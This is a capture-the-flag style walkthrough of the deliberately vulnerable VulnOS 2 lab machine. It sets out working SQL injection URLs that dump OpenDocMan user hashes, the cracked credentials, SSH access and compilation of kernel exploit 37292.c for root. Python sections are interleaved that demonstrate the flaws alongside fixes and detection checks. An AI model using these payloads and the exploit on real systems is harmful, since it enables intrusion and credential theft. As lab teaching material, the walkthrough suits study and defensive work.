royal.gareeb
5 min read, Jan 16, 2020

Vulnhub VulnOS 2 walkthrough | SQL injection in URL

VulnOS: 2 is a boot to root virtual machine which is hosted on Vulnhub.

root@kali:~#nmap -p- 10.0.0.127

Nmap scan report for 10.0.0.127
Host is up (0.00015s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6667/tcp open irc
MAC Address: 08:00:27:AD:6B:C2 (Oracle VirtualBox virtual NIC)

Identify the services and versions running on VulnOS:

root@kali:~/Documents/vulnhub/vulnOS#nmap -sVC -vv -p- 10.0.0.127
Nmap scan report for 10.0.0.127
Host is up, received arp-response (0.00022s latency).
Scanned at 2020-01-15 21:54:19 IST for 20s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| ssh-dss (public key omitted)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDpuBQNKY6U8FF+8yJgjCqn0f9MJ1rCgGLo2HdvhWvbgyOxmvf4mg47Oi4OWjpD7oiiaawPLFJfUPhBl7CVLLnMQxM6MDdmJP1qSl6slA52KB9Qt8hvPiatY9yF2UzTQ+riP9g2n6D9QQruSVQQFsKUeJvte2X7EApMmmXSQ1L/Qziio1mFu4tvqckMsfdjlYnFSRSdKoorT/7/Vw0sBUzDNsSsGq8tA3rqGOKmj3JdS0H0FGEciLFyIx9/rLC2bHc03l2V08Y8MozB3TQTcO6lvxpFgSAEPmNglCAMSZOIFmdIvpmi5FfHsVuP6O94twetVHq0CyvihY8SoXQoiqib
| 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMTthIC3/w1NQVyFFPrMh63/cVUWJylryc7v9Whbab9DKivYIWxffvI6HJpjeMm63ChJV9HjkbtGBbKhnNeRJ64=
| 256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMx/VEravl9aUxne0KuM0Eexc8iu9sMLlyKfDQJ7XIn4
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc syn-ack ttl 64 ngircd
MAC Address: 08:00:27:AD:6B:C2 (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 15 21:54:39 2020 -- 1 IP address (1 host up) scanned in 21.16 seconds

Port 80 — Enumerating http Apache httpd 2.4.7 ((Ubuntu))

Open 10.0.0.127 in a web browser.

Let's follow the hyperlink on the page. We are presented with another website.

The documentation tab gives away some information about a new site and its credentials.

Click on Home.

Then in the URL I see something like http://10.0.0.127/jabc/?q=node/1. Changing the value through 1, 2, 3, 4, 5, 6, 7 gives http://10.0.0.127/jabc/?q=node/7 when the value is changed from 1 to 7.

Then I open Documentation; the screen shows nothing, so I open the page source and see something like:

<p><span style="color:#000000">For security reasons, this section is hidden.</span></p>
<p><span style="color:#000000">For a detailed view and documentation of our products, please visit our documentation platform at on the server. Just login with guest/guest</span></p>
<p><span style="color:#000000">Thank you.</span></p>

and find a new directory: /jabcd0cs/

Open 10.0.0.127/jabcd0cs/

and see a login page. I log in with guest/guest and try uploading a PHP reverse shell, but it does not upload.

Then I log out from guest.

Now I try SQL injection in the login page

and find an error.

Now I search for an OpenDocMan v1.2.7 exploit.

The exploit states that odm_user parameter is vulnerable to SQL injection.

Then, in the URL:

http://10.0.0.127/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9 from information_schema.columns

Then enumerate the usernames and passwords from odm_user:

http://10.0.0.127/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9%20from%20odm_user

webmin:b78aae356709f8c31118ea613980954b
guest:084e0343a0486ff05530df6c705c8bb4
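The query behind the two URLs above is the classic identifier-concatenation bug: a table name taken from the request is pasted straight into `SELECT ... FROM`, so a UNION with the same column count (nine here) returns whatever the attacker selects. The following is an added example, not OpenDocMan's code or the author's: it rebuilds that pattern against a constructed in-memory SQLite stand-in for `odm_user` (the column layout is an assumption; the two rows are the ones the walkthrough lists), shows the page's `add_value` payload leaking `username:password` pairs, and shows the fix. Because a table name cannot be bound as a query parameter, the hardened version allow-lists the identifiers the endpoint legitimately serves and rejects anything else. SQLite has no `concat()` or `information_schema`, so the payload uses `||` and skips the schema-discovery step, which is MySQL-specific.

```python
import sqlite3

# Constructed stand-in for the OpenDocMan user table (assumed 9-column layout,
# since the page's UNION supplies nine values). Not the project's real schema.
ODM_COLUMNS = ["id", "username", "password", "department", "phone",
               "email", "last_name", "first_name", "pw_reset_code"]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE odm_user (%s)" % ", ".join(ODM_COLUMNS))
    db.executemany("INSERT INTO odm_user VALUES (?,?,?,?,?,?,?,?,?)", [
        # hashes exactly as the walkthrough recovered them
        (1, "webmin", "b78aae356709f8c31118ea613980954b", 1, "", "", "", "", ""),
        (2, "guest", "084e0343a0486ff05530df6c705c8bb4", 1, "", "", "", "", ""),
    ])
    # a harmless table this endpoint might legitimately serve (constructed)
    db.execute("CREATE TABLE odm_department (id INTEGER, name TEXT)")
    db.execute("INSERT INTO odm_department VALUES (1, 'IT')")
    return db


def lookup_vulnerable(db, add_value):
    # Assumed shape of the ajax_udf.php query: the request value is used as
    # the table name by plain string concatenation, which is what makes the
    # page's "odm_user UNION SELECT ..." payload work.
    return db.execute("SELECT * FROM " + add_value).fetchall()


# Identifiers cannot be parameterised, so the fix is an explicit allow-list.
ALLOWED_TABLES = {"odm_department", "odm_category"}


def lookup_hardened(db, add_value):
    if add_value not in ALLOWED_TABLES:
        raise ValueError("unexpected table name: %r" % add_value)
    # Only a known-good identifier reaches the query; quoting it is belt and braces.
    return db.execute('SELECT * FROM "%s"' % add_value).fetchall()


def demo():
    """Run the page's payload against both versions.

    Returns (leaked_pairs, blocked): the username:hash strings the vulnerable
    query exposes, and whether the hardened query refused the same input."""
    db = make_db()
    # SQLite equivalent of concat(username,0x3a,password) from the page's URL.
    payload = ("odm_user UNION SELECT 1, username || ':' || password, "
               "3,4,5,6,7,8,9 FROM odm_user")
    rows = lookup_vulnerable(db, payload)
    # The injected rows carry the concatenated pair in column 2; real rows don't.
    leaked = [row[1] for row in rows if ":" in str(row[1])]
    try:
        lookup_hardened(db, payload)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    print(demo())
```

The lesson is that a parameter which names a table or column needs an allow-list, not escaping: no amount of quoting turns `odm_user UNION SELECT ...` into a safe identifier.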

Then crack the hashes using CrackStation:

webmin:b78aae356709f8c31118ea613980954b:webmin1980
guest:084e0343a0486ff05530df6c705c8bb4:guest
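The hashes fell instantly because they are unsalted MD5: the digest is a pure function of the password, so a precomputed table such as CrackStation's maps it straight back to the plaintext. The following is an added example (not the page's or OpenDocMan's code) that reproduces that lookup locally over a small constructed candidate list against the two digests the walkthrough lists, then shows the storage scheme that defeats the table: PBKDF2-HMAC-SHA256 with a random per-user salt, where two users with the same password get different stored values and verification uses a constant-time comparison. The candidate list and the `salt$iterations$digest` storage format are assumptions of this example.

```python
import hashlib
import hmac
import os

# The two digests as recovered on the page, keyed by username.
PAGE_HASHES = {
    "webmin": "b78aae356709f8c31118ea613980954b",
    "guest": "084e0343a0486ff05530df6c705c8bb4",
}


def md5_lookup(target_hex, candidates):
    """Precomputed-table style lookup: because unsalted MD5 has no per-user
    input, one table of md5(word) answers every user at once."""
    for cand in candidates:
        if hashlib.md5(cand.encode()).hexdigest() == target_hex:
            return cand
    return None


def hash_password(password, salt=None, iterations=200_000):
    """Store as salt$iterations$digest (format assumed for this example).
    A fresh 16-byte salt means identical passwords hash differently, so no
    shared table can be built, and the iteration count slows each guess."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "%s$%d$%s" % (salt.hex(), iterations, digest.hex())


def verify_password(password, stored):
    salt_hex, iters, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    # constant-time compare so timing does not leak how many bytes matched
    return hmac.compare_digest(digest.hex(), digest_hex)


def demo():
    """Constructed wordlist containing the two plaintexts the page recovered."""
    candidates = ["password", "admin", "guest", "webmin", "webmin1980"]
    return {user: md5_lookup(h, candidates) for user, h in PAGE_HASHES.items()}


if __name__ == "__main__":
    print(demo())
    stored = hash_password("guest")
    print(stored, verify_password("guest", stored))
```

Note that the PBKDF2 version still cannot protect a password as weak as `guest`; it only removes the free table lookup and makes each guess cost a configurable amount of work.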

Log in over SSH using user webmin and password webmin1980.

Now I have the shell; convert it to a proper shell using the command:

webmin@VulnOSv2:~$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)

Privilege Escalation

Search the OpenDocMan directory structure for where OpenDocMan stores its config files.

After some enumeration we find config.php:

webmin@VulnOSv2:/var/www/html/jabcd0cs$ cat config.php

and find the MySQL user root with password toor.

Try the MySQL root password as the system root password: authentication failure.

webmin@VulnOSv2:/var/www/html/jabcd0cs$ su root
Password:
su: Authentication failure
webmin@VulnOSv2:/var/www/html/jabcd0cs$

Then try sudo -l:

webmin@VulnOSv2:/var/www/html/jabcd0cs$ sudo -l
[sudo] password for webmin:
Sorry, user webmin may not run sudo on VulnOSv2.
webmin@VulnOSv2:/var/www/html/jabcd0cs$

Then try:

webmin@VulnOSv2:/var/www/html/jabcd0cs$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux

and searchsploit for 3.13.0-24-generic #47-Ubuntu:

root@kali:~/Documents/vulnhub/vulnOS# searchsploit ubuntu

Linux Kernel 2.13.0 < 3.19 (Ubun | exploits/linux/local/37292.c

Compile the exploit using gcc:

webmin@VulnOSv2:/tmp$ gcc 37292.c -o ofs

Run the exploit:

webmin@VulnOSv2:/tmp$ ls
37292.c ofs vulnoskernal
webmin@VulnOSv2:/tmp$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
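Two things in the escalation above are directly checkable from the defender's side: the searchsploit entry gives an affected kernel range (3.13.0 up to but not including 3.19), and the exploit's own output announces `/etc/ld.so.preload created`, a file that should not exist on a normal host and which, when present, is read by the dynamic loader for every new process. The following is an added host-triage example, not the page's or the exploit's code: it parses a `uname -r` style release string and tests it against that range, and it inspects an `ld.so.preload` file, flagging entries that point into world-writable locations. The range bounds come from the page's searchsploit line; the "suspicious directory" heuristic and the file-path parameter are assumptions of this example.

```python
import os
import re

# Affected range as stated by the searchsploit entry on the page: 3.13.0 <= v < 3.19.
AFFECTED_LOW = "3.13.0"
AFFECTED_HIGH = "3.19.0"

# Heuristic (assumption): a legitimately preloaded library lives under /usr or /lib,
# not in a scratch directory any user can write to.
SUSPICIOUS_PREFIXES = ("/tmp/", "/dev/shm/", "/var/tmp/", "/home/")


def parse_release(release):
    """'3.13.0-24-generic' -> (3, 13, 0); ignores the distro suffix."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", release.strip())
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(x) for x in m.groups())


def in_affected_range(release, low=AFFECTED_LOW, high=AFFECTED_HIGH):
    """True when the running kernel falls inside the range the advisory names.
    A version match is a prompt to check the distro's patch level, not proof
    of exploitability, since vendors backport fixes without bumping the base version."""
    return parse_release(low) <= parse_release(release) < parse_release(high)


def preload_entries(text):
    """Non-empty lines of an ld.so.preload file; the loader treats each as a library path."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def suspicious_entries(entries):
    """Entries under a world-writable or user-owned prefix."""
    return [e for e in entries if e.startswith(SUSPICIOUS_PREFIXES)]


def preload_check(path="/etc/ld.so.preload"):
    """Returns (exists, entries, suspicious). Existence alone is worth an alert."""
    if not os.path.exists(path):
        return False, [], []
    with open(path) as fh:
        entries = preload_entries(fh.read())
    return True, entries, suspicious_entries(entries)


if __name__ == "__main__":
    # Release string exactly as the walkthrough's uname -a printed it.
    release = "3.13.0-24-generic"
    print(release, "affected:", in_affected_range(release))
    print("ld.so.preload:", preload_check())
```

Running this as part of a baseline check gives two cheap signals: a kernel sitting in a known-bad range is a patching ticket, and a freshly created `/etc/ld.so.preload` pointing at a library in `/tmp` is an incident.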

Then:

# cd /root
# ls

flag.txt

# cat flag.txt
Hello and welcome.
You successfully compromised the company “JABC” and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

enjoy your hacking